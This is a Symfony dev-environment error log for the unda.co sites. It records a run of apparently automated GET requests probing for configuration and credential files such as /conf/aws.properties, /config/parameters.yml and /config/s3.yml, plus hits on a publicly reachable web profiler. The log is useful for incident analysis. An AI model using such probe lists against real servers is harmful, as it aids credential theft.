[2025-12-20 20:12:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bundleconfig.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bundleconfig.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /circle.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /circle.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /compose.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /compose.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/application.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/application.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/aws.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/aws.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/aws.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/aws.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:13:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/conf.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/conf.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/config.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/config.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/monitor.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/monitor.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf/s3.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf/s3.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=twig","method":"GET"} []
[2025-12-20 20:14:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 20:14:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.prod.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.prod.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:14:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:15:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:15:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:15:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c80c7d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c80c7d?panel=time","method":"GET"} []
[2025-12-20 20:15:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 20:15:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/application.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/application.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:16:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/aws.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/aws.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:16:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/aws.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/aws.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:16:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/base.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/base.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:17:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.exs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.exs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:17:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.ino"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.ino\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:17:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:17:44] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cc2d11","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cc2d11/search/results?ip=74.7.242.57&limit=10","method":"GET"} []
[2025-12-20 20:17:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=74.7.242.57&limit=10","method":"GET"} []
[2025-12-20 20:18:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/daemon.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/daemon.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:18:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/default.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/default.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:18:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/dev/config.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/dev/config.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:18:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/development.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/development.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:19:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/local.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/local.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:19:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/model.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/model.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:19:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/parameters.yml.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/parameters.yml.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:20:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/php.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/php.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:20:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/prod.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/prod.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:20:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/production.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/production.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
[2025-12-20 20:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 20:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=config","method":"GET"} []
[2025-12-20 20:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 20:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/s3.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/s3.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:21:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:21:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/sitemap.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/sitemap.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
